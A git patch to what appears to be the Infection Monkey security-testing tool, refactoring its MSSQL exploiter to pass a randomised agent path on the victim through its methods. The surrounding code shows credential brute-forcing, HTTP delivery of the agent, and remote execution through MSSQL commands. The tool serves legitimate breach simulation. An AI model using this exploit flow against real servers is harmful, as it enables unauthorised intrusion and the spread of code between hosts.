From 51cfb73ce062980bf5ebf72fc3370304b667628e Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Mar 2022 17:21:53 +0100 Subject: [PATCH] Agent: User random binary destination path for MSSQL Exploit --- monkey/infection_monkey/exploit/mssqlexec.py | 40 ++++++++++---------- 1 file changed, 21 insertions(+), 19 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dbbc265f2..fb2b6f46e 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,5 +1,6 @@ import logging import os +from pathlib import Path from time import sleep import pymssql @@ -59,6 +60,8 @@ class MSSQLExploiter(HostExploiter): Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after """ + monkey_path_on_victim = get_agent_dest_path(self.host, self.options) + # Brute force to get connection creds = generate_identity_secret_pairs( self.options["credentials"]["exploit_user_list"], @@ -82,14 +85,14 @@ class MSSQLExploiter(HostExploiter): self.create_temp_dir() self.create_empty_payload_file() - http_thread = self.start_monkey_server() - self.upload_monkey() + http_thread = self.start_monkey_server(monkey_path_on_victim) + self.upload_monkey(monkey_path_on_victim) MSSQLExploiter._stop_monkey_server(http_thread) # Clear payload to pass in another command self.create_empty_payload_file() - self.run_monkey() + self.run_monkey(monkey_path_on_victim) self.remove_temp_dir() except Exception as e: @@ -129,8 +132,8 @@ class MSSQLExploiter(HostExploiter): raise Exception("Couldn't execute MSSQL exploiter because payload was too long") self.run_mssql_commands(array_of_commands) - def run_monkey(self): - monkey_launch_command = self.get_monkey_launch_command() + def run_monkey(self, monkey_path_on_victim: Path): + monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) self.run_mssql_command(monkey_launch_command) self.run_payload_file() @@ -139,8 +142,8 @@ class MSSQLExploiter(HostExploiter): self.cursor.execute(cmd) sleep(MSSQLExploiter.QUERY_BUFFER) - def upload_monkey(self): - monkey_download_command = self.write_download_command_to_payload() + def upload_monkey(self, monkey_path_on_victim: Path): + monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) self.run_payload_file() self.add_executed_cmd(monkey_download_command.command) @@ -155,10 +158,9 @@ class MSSQLExploiter(HostExploiter): ) self.run_mssql_command(tmp_dir_removal_command) - def start_monkey_server(self) -> LockedHTTPServer: - dst_path = get_agent_dest_path(self.host, self.options) + def start_monkey_server(self, monkey_path_on_victim: Path) -> LockedHTTPServer: self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( - self.host, dst_path, self.agent_repository + self.host, str(monkey_path_on_victim), self.agent_repository ) return http_thread @@ -167,27 +169,27 @@ class MSSQLExploiter(HostExploiter): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def write_download_command_to_payload(self): - monkey_download_command = self.get_monkey_download_command() + def write_download_command_to_payload(self, monkey_path_on_victim: Path): + monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) self.run_mssql_command(monkey_download_command) return monkey_download_command - def get_monkey_launch_command(self): - dst_path = get_agent_dest_path(self.host, self.options) + def get_monkey_launch_command(self, monkey_path_on_victim: Path): # Form monkey's launch command - monkey_args = build_monkey_commandline(self.host, self.current_depth - 1, dst_path) + monkey_args = build_monkey_commandline( + self.host, self.current_depth - 1, monkey_path_on_victim + ) suffix = ">>{}".format(self.payload_file_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX return MSSQLLimitedSizePayload( - command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), + command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args), prefix=prefix, suffix=suffix, ) - def get_monkey_download_command(self): - dst_path = get_agent_dest_path(self.host, self.options) + def get_monkey_download_command(self, monkey_path_on_victim: Path): monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( - http_path=self.agent_http_path, dst_path=dst_path + http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) ) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(